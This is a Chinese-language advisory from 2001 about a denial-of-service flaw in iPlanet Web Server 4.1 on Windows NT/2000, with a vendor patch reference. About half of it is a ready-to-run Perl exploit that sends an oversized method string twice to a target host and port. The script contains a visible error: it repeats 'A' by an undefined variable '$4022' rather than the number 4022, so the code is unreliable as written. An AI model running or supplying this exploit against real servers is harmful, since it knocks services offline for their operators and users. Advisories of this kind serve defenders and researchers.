iPlanet Web Server 4.1 Method和URI拒绝服务攻击
发布日期:2001-05-22
更新日期:2001-05-22
受影响系统:
iPlanet Web Server 4.1 SP3-SP7
- Microsoft Windows NT
- Microsoft Windows 2000
描述:
iPlanet Web Server 4.1存在一个远程决绝服务漏洞。
通过向iPlanet Web Server 4.1发送一个4022字节长的无效method或URI请求,
将导致iPlanet Web Server停止响应后续的Web请求。
此漏洞只影响运行在Microsoft Windows NT/2000 系列平台下的IWS 4.1.
<*来源:Robert Cardona (
dasquid@digizen-security.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 2) {
print "Usage: host port\n";
exit;
}
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET->new(Proto=>"TCP",
PeerAddr=>$ARGV[0],
PeerPort=>"$ARGV[1]",)
or die "Cant connect to $ARGV[0]: $!\n";
$sock->autoflush(1);
print $sock "$overflow /index.html HTTP/1.0\n\n";
$response=<$sock>;
print "$response";
while(<$sock>){
print "$_\n";
}
close $sock;
}
建议:
厂商补丁:
厂商已经提供了一个NSAPI补丁来临时解决这个问题:
http://iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
这个问题也将在iPlanet Web Server ,4.1 Service Pack 8中被彻底解决。
浏览次数:4064
严重程度:0(网友投票)